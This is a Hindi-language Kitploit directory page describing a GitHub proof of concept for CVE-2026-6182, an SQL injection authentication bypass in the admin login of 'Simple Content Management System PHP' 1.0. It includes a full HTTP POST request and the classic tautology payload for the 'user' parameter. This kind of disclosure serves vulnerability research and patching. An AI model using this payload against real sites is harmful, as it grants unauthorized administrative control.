Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-6182-SQLI-auth — प्रूफ-ऑफ-कॉन्सेप्ट PHP सिंपल कंटेंट मैनेजमेंट सिस्टम में SQL इंजेक्शन प्रमाणीकरण बायपास के लिए, जो बिना प्रमाणीकरण वाले हमलावरों को तैयार किए गए उपयोगकर्ता पैरामीटर के माध्यम से एडमिन एक्सेस प्राप्त करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/xmyronn/cve-2026-6182-sqli-auth
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubxmyronn/cve-2026-6182-sqli-auth

CVE-2026-6182-SQLI-auth

प्रूफ-ऑफ-कॉन्सेप्ट PHP सिंपल कंटेंट मैनेजमेंट सिस्टम में SQL इंजेक्शन प्रमाणीकरण बायपास के लिए, जो बिना प्रमाणीकरण वाले हमलावरों को तैयार किए गए उपयोगकर्ता पैरामीटर के माध्यम से एडमिन एक्सेस प्राप्त करने की अनुमति देता है।

रिपॉजिटरी देखें
65 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SQL इंजेक्शन प्रमाणीकरण बायपास - सिंपल कंटेंट मैनेजमेंट सिस्टम PHP

विवरण

सिंपल कंटेंट मैनेजमेंट सिस्टम PHP के एडमिन लॉगिन पेज में SQL इंजेक्शन भेद्यता मौजूद है। user पैरामीटर को SQL क्वेरी में पास करने से पहले सैनिटाइज़ नहीं किया जाता है, जिससे एक अनप्रमाणित हमलावर प्रमाणीकरण को बायपास कर पूर्ण एडमिन एक्सेस प्राप्त कर सकता है।


भेद्यता विवरण

  • प्रकार: SQL इंजेक्शन (CWE-89)
  • प्रभाव: प्रमाणीकरण बायपास, हमें पूर्ण एडमिन एक्सेस मिलता है
  • प्रभावित फ़ाइल: /web/admin/login.php
  • प्रभावित पैरामीटर: user
  • हमले का वेक्टर: रिमोट, अनप्रमाणित **गंभीरता: क्रिटिकल

विक्रेता

code-projects.org

उत्पाद

सिंपल कंटेंट मैनेजमेंट सिस्टम PHP

संस्करण

1.0


प्रूफ ऑफ कॉन्सेप्ट (PoC)

चरण 1 - burp में निम्नलिखित अनुरोध भेजें:

root@kitploit:~
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded

user=test'+or+1%3D1+--+-&password=test&submit=Login

या बस इसे लॉगिन पेज में जोड़ें Screenshot 2026-04-05 051755

चरण 2 - पेलोड के साथ लॉगिन फॉर्म:

test' or 1=1 -- -

चरण 3 - एडमिन पैनल एक्सेस प्रदान किया गया:

Screenshot 2026-04-05 054510

प्रभाव

एक अनप्रमाणित रिमोट हमलावर बिना किसी क्रेडेंशियल के एडमिन लॉगिन को पूरी तरह से बायपास कर सकता है, जिससे एडमिन पैनल पर पूर्ण नियंत्रण प्राप्त होता है, जिसमें कंटेंट जोड़ना भी शामिल है।


लेखक

इमाद अल्वी


संदर्भ

https://code-projects.org/simple-content-management-system-in-php-with-source-code/

टूल डाउनलोड करें